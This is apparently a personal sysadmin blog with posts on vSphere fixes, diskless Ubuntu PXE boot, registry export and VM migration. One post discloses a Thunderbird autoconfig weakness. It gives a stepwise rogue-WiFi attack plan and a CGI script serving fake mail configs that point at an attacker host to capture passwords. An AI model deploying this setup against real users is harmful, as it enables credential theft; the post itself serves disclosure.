Friday 12 March 2021

Safe (?) password change on web pages - idea draft

What if we improved web forms for password changes in the way described below, to avoid password leaks due to MITM or application/server-side compromise?

Idea:

When the user sets a password, the browser creates a key pair, protects the private key with the password, and sends both the private and the public key to the server.

When the user opens the login page, the server encrypts a token with the public key and sends both the encrypted token and the user's (password-protected) private key to the page. When the user types the password into the login form, the browser unseals the private key with the password, decrypts the token, and then uses the token for authentication.

This way the user's password never reaches the server, yet the user can still authenticate with the password from any endpoint (no need to keep the private key locally).
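
Just to make the flow concrete, here is a rough sketch using the openssl CLI (the file names and token format are made up for illustration; a real implementation would do this in the browser, e.g. with WebCrypto, and use a proper challenge/response format):

# 1. "Password change": the client generates a key pair and protects the
#    private key with the user's password.
openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:2048 -out private.pem
openssl pkcs8 -topk8 -in private.pem -out private_enc.pem -passout pass:'the-user-password'
openssl pkey -in private.pem -pubout -out public.pem
# private_enc.pem and public.pem are uploaded to the server; private.pem is discarded.

# 2. "Login": the server encrypts a one-time token with the public key...
head -c 32 /dev/urandom > token.bin
openssl pkeyutl -encrypt -pubin -inkey public.pem -in token.bin -out token.enc
# ...and sends token.enc together with private_enc.pem to the login page.

# 3. The client unseals the private key with the password and recovers the token,
#    which it then presents to the server as proof of knowing the password.
openssl pkey -in private_enc.pem -passin pass:'the-user-password' -out private_dec.pem
openssl pkeyutl -decrypt -inkey private_dec.pem -in token.enc -out token.dec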

There are downsides to this approach, but it is still interesting to consider. Actually, has this ever been considered before? This page is just to dump the idea on paper.

The main downside: the password-protected private key can be easily collected, and with a weak password it is relatively easy to brute-force offline.

Monday 19 August 2019

MS Spear Phishing Attack simulator can potentially expose your users' passwords

It has been quite some time since my last post, but I had a pretty interesting case recently, and because MS support does not seem interested in investigating it more deeply themselves, I wanted to put this piece of information somewhere, so others can also be aware of a potential security flaw in the tool called "Spear Phishing (Credentials Harvest) Account Breach" from the Attack Simulator set of tools. You can find these tools on the Office 365 Security & Compliance portal, in the Threat management section.

First of all, what is this tool and what does it do? In short, it lets you send a specially crafted message to your users which contains links to a quasi-malicious page disguised as the genuine Office 365 login page. Why "quasi-"? Because these pages are in fact on MS-controlled domains, just not ones used for real MS services. Example links from the tool: http://portal.docdelivaryapp.com, http://portal.hardwarecheck.net or http://portal.docstoreinternal.net.

Tuesday 20 October 2015

Insecure autoconfiguration lookups in Thunderbird

Recently I tried the autoconfiguration feature in Thunderbird. While trying to figure out how it works and in what sequence it looks up the configuration, I noticed that I didn't have SSL configured on my test web server, yet Thunderbird received the configuration anyway.

Of course, I have some concerns about Thunderbird not using SSL when it looks up the configuration. Here I found a final (?) conclusion about using SSL:
DNS MX: Mail delivery between domains happens via DNS MX lookups,
 which are insecure. In other words, an attacker can already
 re-route and intercept new mails. The risk of interception during
 account setup is not larger than that. More importantly:
Guessed configs: An attacker can easily *prevent* connections,
 making the ispdb lookup (via https), isp fetch (via https) and
 heuristics for IMAP SSL servers and IMAP servers with secure auth mechs
 all fail, making us fall back to plaintext auth, and that's it, game over.
 Therefore, lookups via http don't add risk.
But I cannot agree with that, because intercepting emails is not the only possible goal of such an attack.

I made an experiment and created a network with a specially prepared DNS server which redirects autoconfig.gmail.com and gmail.com to a local HTTP server, with an autoconfig file that points to the wrong IMAP and SMTP servers. Thus, when the client configures an account and just clicks "Continue" and "Done" without looking at the IMAP server address, an attacker can intercept the password by providing a server address for which he holds an SSL certificate.

Good news: it's not so easy to use a pretty-looking address like the one in the screenshot, because you need a trusted SSL certificate for that name. And if the provided IMAP/SMTP configuration doesn't use SSL, Thunderbird warns you with a big red window.

However, the attacker can use any server name for which he has a stolen certificate, and the user may simply not pay enough attention to the values in the configuration.

Attack vector: force users to reconfigure their mail client with fake mail servers.
  • Prepare a router with a transparent proxy and/or a specially configured DNS service.
  • Router shall block all encrypted outgoing IMAP and SMTP connections.
  • The router redirects all autoconfig.[domainname] and [domainname]/autoconfig... requests to a web server with a prepared fake configuration. (It can be a script that responds with a configuration for any domain requested; see the sketch after this list.)
  • Prepare a server with IMAP and SMTP services and a stolen SSL certificate. The DNS service directs all requests to this server.
  • Put this setup with an open WiFi to any crowded place (hotels, hospitals, bus/train stations, etc.).
  • ... PROFIT
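
For illustration, the fake configuration could be produced by a trivial CGI script like the sketch below (all host names are made up; the XML follows Thunderbird's config-v1.1 autoconfig format, and a real script would also echo back the requested domain):

#!/bin/sh
# Hypothetical CGI script on the fake web server: it returns the same
# config for whatever domain the client asks about, pointing IMAP/SMTP
# at a host the attacker holds a (stolen) certificate for.
echo "Content-Type: text/xml"
echo ""
cat << 'EOF'
<clientConfig version="1.1">
  <emailProvider id="fake-provider">
    <domain>example.com</domain>
    <displayName>Mail</displayName>
    <incomingServer type="imap">
      <hostname>mail.attacker-owned.example</hostname>
      <port>993</port>
      <socketType>SSL</socketType>
      <authentication>password-cleartext</authentication>
      <username>%EMAILADDRESS%</username>
    </incomingServer>
    <outgoingServer type="smtp">
      <hostname>mail.attacker-owned.example</hostname>
      <port>465</port>
      <socketType>SSL</socketType>
      <authentication>password-cleartext</authentication>
      <username>%EMAILADDRESS%</username>
    </outgoingServer>
  </emailProvider>
</clientConfig>
EOF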

Of course, the setup above is very simplified. The final configuration can be more intelligent and should let the user browse the Internet and use other services normally, so the user is convinced that the only problem is the mail client.

Some users tend to reconfigure their applications from scratch if something doesn't work. Of course, building this setup only to collect Thunderbird users' passwords is not very effective, but it could be part of an attacker's toolset aimed at collecting data on public networks.

Tuesday 26 March 2013

vSphere wrongly allows a RAW-mapped logical drive to be used by two VMs

I haven't written anything on my blog for quite some time, mostly because nothing really interesting has happened.

However, I recently faced some weird vSphere behavior, after which I had to recover two file servers. vSphere allowed me to RAW-map an FC-connected logical drive to a VM despite it already being mapped to another one.

Well, it was our own fault that we didn't label this logical drive properly, so when I took a look in DS Storage Manager, it showed the drive under a name like "DATA3". When I asked my colleagues, they told me it was probably an unused piece of the storage.

Actually, I was going to create another logical drive in order to extend an LVM volume on one of our Linux file servers. So, being completely sure that vSphere would not allow me to RAW-map an already used logical drive, I mapped this one to the VM and extended the file system, adding those 2TB.

Because this was a production server, I performed an online resize (reiserfs), after remounting in read-only mode of course.

Two days later, our monitoring system notified me that there were serious FS errors on this server. Well, I was quite surprised, because I had extended reiserfs partitions online before with no issues. However, thinking this was a bug in a partially supported (?) FS related to resizing relatively big partitions (3TiB to 5TiB), I unmounted the volume and ran reiserfsck.

After the recovery completed (a few errors were fixed), I mounted it back and was happy... until the next day...


The next day I was notified about errors again. WTF? Running reiserfsck again... After it finished, it recommended... rebuilding the whole tree... s**t! Almost 3TB of data, several million small files, on shared SATA storage...


OK, needed means needed... Starting the rebuild. At the same time I began restoring data from backup to another partition, in order to compare the differences. And at that moment...


- "Hello, I cannot access home folders. Can you check please?"
- "One moment..... Uhm.... what the...?! Seems like we have a H/W failure, I'll call you back.."

Home folders on a Windows file server had disappeared... Disk Management showed a 2TiB drive with an "Unknown" partition...

It hit me like a blood-freezing bolt of lightning!


Switching to the vSphere client console, Windows VM settings -> Hard disk 2 ->  Manage Paths.... Error!


vCenter somehow "forgot" about this RAW-mapping, and treated the logical volume as a free! S**T!


Recovery procedure

By this moment the FS tree rebuild had completed. I switched the recovered partition to read-only and started an rsync to a new one. Luckily we had enough free space.

The restore from backup took a lot of time because (of course) the data was fragmented across different tapes, so most of the time was spent watching the status "changing tape"...

The Windows server... Disaster... Precisely a few days before (in order to optimize our backups), the old backup had been completely removed, and the new configuration was still being prepared. Shame on our backup administrators...

So, after the rsync process on the Linux server completed, I disconnected the "problematic" drive from the Linux server and began to scan it on the Windows server with a tool named Restorer2000 Ultimate. Even though I chose to search only for NTFS partitions, after the scan finished I had a few thousand potential FS structures. It took some time to find the proper one, and then the recovery process began.

I like NTFS for its recovery possibilities. I was able to recover almost all of the 1.6TB of data, except for several damaged files.

It was the same on the Linux file server: a checksum comparison with the backup copy showed no differences.

In the end we lost far less data than we could have. I cannot say it was a new experience for me, because I have had even worse disasters in my practice. But (again) it convinced me of the necessity of proper labels!

PS: Unfortunately, under heavy pressure from users I had no time to record everything, so I don't currently have enough data to submit a bug to VMware. And I have no free resources to try to reproduce it.

Wednesday 5 December 2012

vSphere: A general system error occurred: Authorize Exception

This article may help you if the solution from the VMware Knowledge Base article titled "vCenter Server login fails with error: A general system error occurred: Authorize Exception" does not help.

Symptoms (as from KB)

  • vCenter Server services are running, but a user that was previously able to log into vCenter Server no longer can
  • A local admin account is able to log in, but domain users cannot
  • You see this error:

    A general system error occurred: Authorize Exception

Additionally

  • Re-joining the domain doesn't help
  • The primary (and secondary) Domain Controllers that were used before have been changed
  • C:\Program Files\VMware\Infrastructure\SSOServer\webapps\ims\WEB-INF\classes\krb5.conf contains wrong kdc entries.
    NB: Don't try to edit this file. It's automatically generated.

Cause

  • The Single Sign-On service uses the old DC name(s) when binding to Active Directory

Resolution

  1. Install the vSphere Web Client (don't forget that you should use the admin@System-Domain username in order to connect it to SSO)
  2. Log in to the Web Client (https://vcenter.company.com:9443/vsphere-client/) using the SSO admin account - admin@System-Domain
  3. On the Administration page, select the Configuration menu under the Sign-On and Discovery section
  4. Select the desired identity source (type: Active Directory), click Edit and write down (or screenshot) all of the connection options
    I want to point out that in my case changing the server URLs had no effect - no changes were saved after OK was pressed, so...
  5. Remove the old identity source and add a new one with the same parameters, but with the new server URLs
  6. Done



Not important

To be honest, this was the most interesting issue of the last couple of months, mostly because every other issue I faced had already been solved by someone else, so any problem was solved by following the obvious scenario: problem -> logs -> google -> solution.

This time I had to switch on my imagination, because all the solutions for the "Authorize Exception" problem suggested re-joining AD and/or fixing AD/DNS problems. So we spent several hours fixing non-existent problems.

Well, we knew that the Domain Controllers had been changed, but we completely forgot about SSO, and nobody knew/remembered that SSO uses its own configuration (based on MIT Kerberos) to bind to AD.

But even once the problem was located, I spent the next couple of hours examining SSO logs and trying to find where the AD discovery configuration could be changed. It's a pity that it's not possible to configure it via some CLI (at least I didn't find anything).

Hope this article helps. If so, I would appreciate it if you considered leaving a comment.

Monday 19 November 2012

DELL Printer drivers for Linux (PPD)

Paradox: to install a DELL printer in Linux, you need to download drivers for Windows...

It's a pity, actually, that DELL ignores Linux users this way.

Today I received a request: users were not able to find Ubuntu drivers for their printers. After almost an hour of searching for PPD files for different printers, I finally found a way to get them without wasting time on searching.

Simply download the Windows driver from Dell and unpack it (although it has an EXE extension, it's just a self-extracting ZIP - I used 7-Zip), then search for *.pp_ files. You may find versions for different languages. Select the file from the directory for your language and unpack it under Windows using the following command:

expand filename.pp_ filename.ppd

That's it. Now you can use this PPD file to install a printer under Ubuntu.
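
If you prefer to script the unpack-and-search part on Linux, it boils down to something like this (a sketch only; the driver file name is made up, and the final expand step still happens under Windows as shown above):

7z x Dell_Printer_Driver_A00.exe -o./dell_driver    # the EXE is just a self-extracting archive
find ./dell_driver -iname '*.pp_'                   # list the compressed PPD files per language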

PS: Of course this works only for printers that support PostScript.

Thursday 8 November 2012

VMWare: Remove datastore problem - "The resource xxxxxxxxxxxxxxxxxxxxx" is in use

Today I faced a situation where I had removed all VMs from a datastore but still couldn't remove it because of the following error:

Status: The resource 'xxxxxxxxxxxxxxxxxx' is in use.

The first thing I did was unmount the datastore on all hosts in the cluster. This allowed me to find the two hosts which had locked the datastore. While all other hosts let me unmount it with no problem, those two returned an error:

Status: The resource 'xxxxxxxx' is in use.
Error Stack: Cannot unmount volume 'xxxxxxxx' because file system is busy. Correct the problem and retry the operation.

At this moment I remembered that some time ago, in order to install an upgrade, I had configured the ScratchConfig option on those two hosts to use an external location.

Tip:
Go to "Inventory > Hosts and Clusters", select host that uses a datastore, goto "Configuration" tab, and click on "Advanced Settings" option. Find "ScratchConfig" section and change to something else (e.g. /tmp). Restart the host. Now you will be able to remove the datastore.

PS: Of course, this tip is kind of useless if it was you who configured this option in the first place. But it may help if you've inherited some legacy setup that you didn't configure yourself.

PPS: I didn't hit this situation myself, but I'd also advise checking the Syslog.global.logDir option.

VMWare Cluster - Remove datastore failed - The vSphere HA agent on host '10.0.0.1' failed to quiesce file activity on datastore '/vmfs/volumes/XXXXXXXXXXXXX'. To proceed with the operation to unmount or remove a datastore, ensure that the datastore is accessible, the host is reachable and its vSphere HA agent is running.

For the last few days I have been doing some reorganization of our virtual infrastructure. One of the steps of this reorganization is an upgrade from VMFS 3 to VMFS 5 for all the storage connected to the main HA cluster.

Although ESXi can upgrade to VMFS 5 in place, I decided to completely remove and re-create the datastores. The main reason was that previously all arrays were sliced into several 2TiB(-1MiB) logical drives, and I wanted to create a single logical unit for each storage subsystem.

But almost every time I tried to remove an old datastore from ESXi, I received an error:


Status: The vSphere HA agent on host '10.0.0.1' failed to quiesce file activity on datastore '/vmfs/volumes/XXXXXXXXXXXXX'. To proceed with the operation to unmount or remove a datastore, ensure that the datastore is accessible, the host is reachable and its vSphere HA agent is running.


Tip:
Well, the solution is quite simple. Just go to the host which generated the error (in my example it's 10.0.0.1) in the "Inventory > Hosts and Clusters" view, and remove the datastore from the Summary tab of that host.

Thursday 24 May 2012

Invisible characters in the sssd upstart config cause sssd not to start if /bin/sh is a link to /bin/bash

I've filed a bug for Ubuntu today. Hope they fix it soon, since we don't have much time left before migrating all users from 10.04 to 12.04.

https://bugs.launchpad.net/ubuntu/+source/sssd/+bug/1003845

UPD: Quite impressive. It took only 2 hours after filing the bug to release a fix! Bravo!

Friday 18 May 2012

How to setup diskless Ubuntu 12.04 with read-write root partition


Well, this how-to for a diskless Ubuntu setup is a bit unusual. The main point is that all our infrastructure is based on CentOS, but sometimes (like in this case) we must support other Linux distributions for our clients. That is why all server-side configuration here is for CentOS, and the client side is Ubuntu.

Unlike the official DisklessHowto, this one lets you prepare a shared installation which can be used by any number of clients simultaneously. All changes to the mounted root live in a ramfs, so nothing is written to the NFS share, and everything is gone after a restart. In some (many) cases this is treated as an advantage.

However, I recommend reading the DisklessHowto on the Ubuntu site, since all the basics of network booting Ubuntu are described there much better. Also, I took some parts of their documentation into my how-to. I believe they wouldn't mind.

Requirements

  • DHCP server
  • TFTP server
  • NFS server
All my servers use CentOS, so I will describe the server-side configuration only for this system.
Current server setup is based on CentOS 6.2 x86_64 with IP 192.168.1.10.

Step by step

I. DHCP

I will not describe the basics of DHCP configuration; you can easily google it. In order to make PXE work, you just need to add these two options to your DHCP configuration:

filename pxelinux.0;
next-server 192.168.1.10;

Here next-server provides the address of your TFTP server. These options can be put in almost any section of dhcpd.conf: global, class, subnet, pool, group or host.
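
For example, inside a subnet declaration it could look roughly like this (addresses and ranges are made up; adapt them to your network):

subnet 192.168.1.0 netmask 255.255.255.0 {
    range 192.168.1.100 192.168.1.200;
    option routers 192.168.1.1;
    # PXE boot options
    filename "pxelinux.0";
    next-server 192.168.1.10;
}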

II. TFTP

1. Install the tftp daemon and the syslinux package. Syslinux is available from RPMforge.
# yum install tftp-server syslinux
# chkconfig tftp on
# service tftp start 

2. Copy pxelinux files to tftp directory:
# cp /usr/share/syslinux/pxelinux.0 /tftpboot/
# cp /usr/share/syslinux/vesamenu.c32 /tftpboot/

3. Configure pxelinux
# mkdir /tftpboot/pxelinux.cfg
# cat << EOF > /tftpboot/pxelinux.cfg/default
DEFAULT vesamenu.c32
TIMEOUT 600
ONTIMEOUT BootLocal
PROMPT 0
MENU TITLE My PXE Server (by TORNADO)
ALLOWOPTIONS 1
menu width 80
menu rows 15
MENU TABMSGROW 24
MENU MARGIN 10
NOESCAPE 1
LABEL BootLocal
    localboot 0
    TEXT HELP
    Boot to local hard disk
    ENDTEXT
LABEL UBUNTU_1204_DISKLESS
    MENU LABEL Ubuntu 12.04 (64-bit) DISKLESS
    KERNEL Ubuntu/12.04/x86_64/vmlinuz-3.2.0-20-generic
    APPEND root=/dev/nfs nfsroot=192.168.1.10:/srv/nfsroot/Ubuntu/12.04/x86_64,ro initrd=Ubuntu/12.04/x86_64/initrd.img-3.2.0-20-generic ip=dhcp aufs=tmpfs
    TEXT HELP
    Boot the Ubuntu 12.04 64-bit Diskless
    ENDTEXT
EOF 

III. NFS

1. Install nfs
# yum install nfs-utils

# chkconfig nfs on

# service nfs start

2. Add /srv/nfsroot to exports
# cat << EOF > /etc/exports
/srv/nfsroot *(ro,async,no_root_squash,no_subtree_check,no_all_squash)
EOF

3. Apply exports
# exportfs -r

IV. Prepare installation

1. Install Ubuntu
Generally you have two ways.
  1. Use debootstrap.
    I used this option to prepare some tiny installations (like network boot for a number of POS terminals).
  2. Install the Ubuntu on the real or virtual system and copy it to NFS server.
    In this article I follow this way, because I want to prepare a regular Ubuntu installation.
After the system is installed and configured the way you want, you need to prepare it for network boot.

2. Modify /etc/network/interfaces to set eth0 configuration type to manual:

iface eth0 inet manual

3. Configure /etc/fstab to be looking like this:
# /etc/fstab: static file system information.
#
# <file system> <mount point>   <type>  <options>       <dump>  <pass>
proc            /proc           proc    defaults        0       0
/dev/nfs       /               nfs    defaults          1       1

4.  Change the following options in /etc/initramfs-tools/initramfs.conf:
MODULES=netboot
BOOT=nfs
DEVICE=eth0
NOTE: If the client installation you copied the files from should remain bootable and usable from its local hard disk, restore the former BOOT=local and MODULES=most options in /etc/initramfs-tools/initramfs.conf once the netboot initrd is built. Otherwise, the first time you update the kernel image on the originating installation, the initramfs will be built for network boot, giving you "can't open /tmp/net-eth0.conf" and a kernel panic. Skip this if you no longer need the source client installation.

5. Add to /etc/initramfs-tools/modules line:
aufs

6. Copy aufs module to /etc/initramfs-tools/scripts/modules
$ sudo cp /lib/modules/$(uname -r)/kernel/ubuntu/aufs/aufs.ko /etc/initramfs-tools/scripts/modules

7. Copy the following script to /etc/initramfs-tools/scripts/init-bottom as 00_aufs_init (0755):
#!/bin/sh -e

case $1 in
  prereqs)
    exit 0
    ;;
esac

for x in $(cat /proc/cmdline); do
  case $x in
    root=*)
      ROOTNAME=${x#root=}
      ;;
    aufs=*)
      UNION=${x#aufs=}
        case $UNION in
          LABEL=*)
            UNION="/dev/disk/by-label/${UNION#LABEL=}"
            ;;
          UUID=*)
            UNION="/dev/disk/by-uuid/${UNION#UUID=}"
            ;;
        esac    
      ;;
  esac
done

echo "Union=$UNION"

if [ -z "$UNION" ]; then
    exit 0
fi

modprobe -b aufs && echo "OK: modprobe -b aufs" || echo "ERR: modprobe -b aufs"

# make the mount points on the init root file system
mkdir /aufs /ro /rw && echo "OK: mkdir /aufs /ro /rw" || echo "ERR: mkdir /aufs /ro /rw"

# mount read-write file system
if [ "$UNION" = "tmpfs" ]; then
  mount -t tmpfs rw /rw -o noatime,mode=0755 && echo "OK:  mount -t tmpfs rw /rw -o noatime,mode=0755 " || echo "ERR:  mount -t tmpfs rw /rw -o noatime,mode=0755"
else
  mount $UNION /rw -o noatime
fi

# move real root out of the way
mount --move ${rootmnt} /ro && echo "OK: mount --move ${rootmnt} /ro" || echo "ERR: mount --move ${rootmnt} /ro"

mount -t aufs aufs /aufs -o noatime,dirs=/rw:/ro=ro && echo "OK: mount -t aufs aufs /aufs -o noatime,dirs=/rw:/ro=ro" || echo "ERR: mount -t aufs aufs /aufs -o noatime,dirs=/rw:/ro=ro"

# test for mount points on union file system
[ -d /aufs/ro ] || mkdir /aufs/ro
[ -d /aufs/rw ] || mkdir /aufs/rw

mount --move /ro /aufs/ro && echo "OK: mount --move /ro /aufs/ro" || echo "ERR: mount --move /ro /aufs/ro"
mount --move /rw /aufs/rw && echo "OK: mount --move /rw /aufs/rw" || echo "ERR: mount --move /rw /aufs/rw"

# strip fstab off of root partition
grep -v $ROOTNAME /aufs/ro/etc/fstab > /aufs/etc/fstab

mount --move /aufs /root && echo "OK: mount --move /aufs /root" || echo "ERR: mount --move /aufs /root"

exit 0 

To be honest, this script isn't mine. I found it some time ago and I don't remember where. If you are the author or you know who the author is, please tell me in the comments so I can put the name here.

8. Build a new initrd image:
$ sudo update-initramfs -k $(uname -r) -c -b /root/

9. Now you can copy all of this to the server by executing the following command on the client:

$ sudo rsync -a --exclude=tmp/* --exclude=proc/* --exclude=sys/* --exclude=dev/* / username@192.168.1.10:/srv/nfsroot/Ubuntu/12.04/x86_64/
Be careful with the slashes! rsync treats the source and destination differently if a trailing slash is omitted.
"username" must have write permissions to /srv/nfsroot/Ubuntu/12.04/x86_64.

10. Copy the kernel and the new initrd image to the proper folder under the TFTP root. Run this ON THE SERVER (adjust the kernel version to the one installed on the client, 3.2.0-20-generic in this example):
# cp /srv/nfsroot/Ubuntu/12.04/x86_64/boot/vmlinuz-3.2.0-20-generic /tftpboot/Ubuntu/12.04/x86_64/
# cp /srv/nfsroot/Ubuntu/12.04/x86_64/root/initrd.img-3.2.0-20-generic /tftpboot/Ubuntu/12.04/x86_64/


Notes

Remember that changes to the root filesystem are limited by your RAM. This means you will not be able to copy a 4GB video to /tmp if you have only 2GB of RAM.

I have prepared this post without access to my test environment, so some small mistakes are possible. If you find any, please comment.

Sunday 13 May 2012

Simple export of registry subkeys in HKCU\Software and HKLM\Software

I hadn't written .cmd scripts for a very long time. But a few weeks ago I started facing random failures on my old laptop, so I was forced to migrate. Since the old one had been used intensively for a year, a lot of unnecessary stuff had accumulated. A smooth migration was rather impossible, so I decided to reinstall the system from scratch and install only the software I needed.

I don't like the various automatic migration tools, so all applications were reinstalled and most of them were configured manually again. But some applications had to keep their old configuration, and that configuration generally lives in the registry under keys like HKLM\Software\<Application> and HKCU\Software\<Application>.

I found it very annoying to go through the list of subkeys (more than 100 applications were installed) looking for the ones I needed, so I decided to just dump all the "Software" keys to a backup and restore only the needed pieces later. But if I dumped "Software" to a single file, extracting the needed pieces afterwards would be the same problem.

To solve this problem I used a script that I wrote about 10 years ago, but which is still relevant today. It is VERY simple, and I spent much more time writing this post than these two lines:

for /f "tokens=3 delims=\" %%i in ('reg query HKLM\Software') do reg export "HKLM\Software\%%i" "%%i_HKLM.reg" /y
for /f "tokens=3 delims=\" %%i in ('reg query HKCU\Software') do reg export "HKCU\Software\%%i" "%%i_HKCU.reg" /y

That's it. Put those lines into a .cmd file, execute it, and you will have a bunch of .reg files, one per Software subkey, for both HKLM and HKCU.

Monday 16 April 2012

My Projects: Virtualization - part 2: P2V

Here is the next post in "My Projects" series, and the second one about Virtualization.

After the migration from XEN was finished, we started to migrate all the existing physical machines to virtual ones. Generally, this was one of the lightest projects of the last couple of years. First of all, VMware Converter 4.0 had been released, so all the CentOS machines were migrated smoothly, without an issue. Second, while migrating VMs from XEN I had gathered so much experience that some tasks which had seemed very complicated before were now kind of obvious to me (e.g. playing with LVM volumes).

What we had:

A bunch of  physical servers (IBM) with a range of OSes installed (mainly RH-based).

What was done:

  • Most of servers were migrated using VMware Converter.
  • Some of the older ones were migrated manually, as in the previous project.
  • Some servers were reinstalled as VMs and just services were migrated.

Result:

The result is pretty obvious for this kind of migration. Still, I'll list a couple of benefits:
  • Increased reliability. Very short system outages after a H/W failure (which actually happened twice; HA automatically migrated all VMs to another ESXi host).
  • Uninterrupted maintenance. I just migrate all VMs to another host in the cluster during an upgrade.
  • Energy savings. I cannot provide exact figures, but I was really surprised when reviewing the last report. We save a lot.
  • Convenience. Adding/removing disk space/RAM/vCPUs is just a few mouse clicks now.

Sunday 1 April 2012

My Projects: Virtualization - part 1: XEN to ESX

Here is the next post in "My Projects" series, and this time it is about the Virtualization.

Well, if I think about it, I have used virtualization for a very long time. The first time was jailed environments in FreeBSD about 10 years ago. After that it was VMware Workstation/Server, used mainly at home or for some tests. But my first serious project connected with virtualization took place just three years ago.

What we had:

When I moved to the main R&D center in Poland, they had two or three XEN hosts for virtualization and two new ESX servers with Standard licenses connected to a vCenter Server. Appreciating all the benefits of ESX, it was decided to move all the old services from XEN-based virtualization to ESX. In order to complete this task, two more Standard licenses were bought and I was assigned to migrate 10-20 (don't really remember exactly) VMs.

The funny thing is that VMware Converter 4.0 was released just a few weeks after my project was finished, but I don't feel sorry about that, because I gained invaluable experience. Moreover, some of the migrated VMs couldn't have been migrated with Converter anyway because they were very old, like Fedora Core 1 for example.

Process:

Maybe the way I did this migration looks too tricky, but it worked, and I migrated a few dozen VMs from XEN. Most of the XEN guests had a single disk with /boot and / (root) primary partitions, without LVM. Generally, for CentOS 5.x the migration looked like this:
Important note: this is just an example, without a full description of the commands used. In your case the procedure can be completely different, and a single mistake can cause real harm to your system!
  • Create a VM on ESX
  • Boot the newly created VM from a CentOS CD/ISO in rescue mode with networking enabled
  • Create all necessary partitions and mount them (e.g. /mnt/newsys)
  • On the source VM, allow ssh for root or configure rsyncd
  • Copy all data from the source (e.g. 192.168.1.10) to the destination by executing rsync on the new VM:
    # rsync -ah --progress --delete --exclude="dev/" --exclude="proc/" --exclude="sys/" --exclude="tmp/" root@192.168.1.10:/ /mnt/newsys/
  • Bind-mount /dev, /sys and /proc into /mnt/newsys
  • # chroot /mnt/newsys su -
  • Now it's time to change some values in fstab (to use /dev/sda instead of /dev/xvda) and in grub.conf
  • After this is changed, you must (in most cases) rebuild your initrd (mkinitrd) and reinstall grub (grub-install); see the sketch after this list
  • Temporarily change the IP and boot the system on the new VM
  • Stop all services on the source guest and use rsync to copy the changes
  • Turn off the old VM and change back the IP on the new VM.
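For the fstab/grub.conf/initrd step, the work inside the chroot boils down to something like the sketch below (device names and the kernel version are examples only - check your own system before running anything):

# adjust device names in fstab and grub.conf (CentOS keeps grub.conf under /boot/grub)
sed -i 's|/dev/xvda|/dev/sda|g' /etc/fstab /boot/grub/grub.conf

# rebuild the initrd for the kernel installed in the copied system
KVER=2.6.18-128.el5        # example version - use the one present in /lib/modules
mkinitrd -f /boot/initrd-$KVER.img $KVER

# reinstall the boot loader on the new virtual disk
grub-install /dev/sda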
In most cases this worked, but there were a number of cases where it didn't, for various reasons (e.g. Fedora Core 1). So I also had another way to do the same thing. It was more complicated, but it always worked:
  • Create a VM on ESX with a virtual disk of the same size as on XEN, or a bit bigger
  • Boot it from a CentOS CD in rescue mode with networking enabled
  • Start netcat to listen for the data and pipe it directly to the disk:
    # nc -l 2121 | dd bs=1M of=/dev/sda
  • On the XEN host, stop the source VM (this wasn't necessary in all cases, but it is safer)
  • Send the contents of the virtual disk to the remote VM booted in rescue mode as mentioned above:
    # dd if=/path/to/disk.img bs=1M|nc 123.123.123.123 2121
  • After all data is copied, you can open /dev/sda with fdisk and extend the second partition (by removing it and re-creating it with a bigger size, starting at the same cylinder)
    # fdisk /dev/sda
    : d (delete partition)
    : 2 (choose the 2nd partition)
    : n (new partition)
    : p (let it be a primary partition)
    : 2 (same partition number)
    : <Enter> (accept the default first cylinder - it must match the old starting cylinder)
    : <Enter> (accept the default last cylinder to use all remaining space)
    : w (write changes and exit)
  • After the second partition is enlarged, you must extend the file system with the proper tool (like resize2fs)
    # resize2fs /dev/sda2
  • Next you can mount this partition somewhere (don't forget to mount /boot after /), bind-mount the system FSes like /dev, /sys and /proc, and chroot there.
  • Now it's time to change the values in fstab (to use /dev/sda instead of /dev/xvda) and in grub.conf (same sketch as above)
  • After this is changed, you must (in most cases) rebuild your initrd (mkinitrd) and reinstall grub (grub-install)
  • Temporarily change the IP and boot the new system
  • Stop all services on the source guest and use rsync to copy the changes
  • Turn off the old VM and change back the IP on the new VM.
Of course, with VMware Converter this procedure is no longer needed for a range of Linux servers, but it was a pretty interesting experience.

Result:

When the project was finished, all XEN hosts were reinstalled with ESX Server and configured in a cluster with HA enabled.
During the migration, switching between the old and the new VM for the most important services took about 1-2 minutes (sync the differences and restart the networking services).
Some services were successfully migrated from old Linux versions to the newest CentOS.
A detailed migration procedure was written, which allowed engineers in remote offices to complete their migrations as well.

Saturday 31 March 2012

My Projects: Bacula backup system

This is the third post in the "My Projects" series. This time, like my previous post, it is also dedicated to World Backup Day. Two posts in a day - why not?

Although the project was about the same thing, there were a few significant differences: 1st – a 5-year gap (2009), and 2nd – a mainly Linux environment.


It was a middle-sized company. In the central office they had all the things an IT department must have, including a backup system (TSM). But I was hired in a remote division in another country, where there had been no system administrator before me. There were many things to do, but today we are talking about backups.

What we had:

Three Linux servers, one external storage, limited budget.

Well, with a single storage unit I had no way to protect the data from a failure of that particular storage. But I split the disks in the storage into two different arrays and dedicated one of them to backups only.

This time I wanted something enterprise-level, reliable and scalable. At that time Bacula fit all my needs. The only problem was getting used to it. When I opened the User's Manual and found out it was 764 pages... I was encouraged! Why? My previous job was quite boring, so I was "hungry" for challenges like that. In a few days I was ready to propose a solution and install it in production.

Solution:

Quite simple, as reliable things should be:
  • Bacula as a backup system
    • Standard schedule (see the sample Schedule resource after this list):
    • Daily incremental backups
    • Weekly differential backups
    • Monthly full backups
  • Workstations were also added if the user desired
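
For reference, such a schedule maps to a Bacula Schedule resource roughly like this (a sketch only; the resource name and run times are made up):

Schedule {
  Name = "StandardCycle"
  # monthly full backup
  Run = Level=Full 1st sun at 23:05
  # weekly differential backups
  Run = Level=Differential 2nd-5th sun at 23:05
  # daily incremental backups
  Run = Level=Incremental mon-sat at 23:05
}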

 Result:

A backup system is not supposed to have its configuration changed often. Configured once, it just requires watching the daily notifications and doing periodic test restores.
When a new server was added, it was enough to create a single file with a list of directories to exclude from backup (/tmp, /media, /sys, etc. were excluded by default).

Have a nice World Backup Day!

My Projects: History: backup scripts

This is the second post in the "My Projects" series, and this time it is dedicated to World Backup Day.

Again, I will describe a project from quite some time ago, so some details may be missing.

It was 2004, and one of the first things I decided to improve when I came to the new company was backups. Well, "improve" is not the correct word here, since there was nothing to improve – I had to create it from zero. It was quite surprising that a 6-year-old company didn't have any backup system.

What we had:

No backup system. No money for that.

My experience at that time didn't let me propose any free backup solution; at the same time I was fascinated with writing CMD scripts – I already did most administrative tasks in Windows using the command line. So, instead of trying something ready-made, I decided to write my own bunch of backup scripts.

Solution:


After a few days of work I had something like the following:

  • A nightly script scanned all the folders listed in a text file.
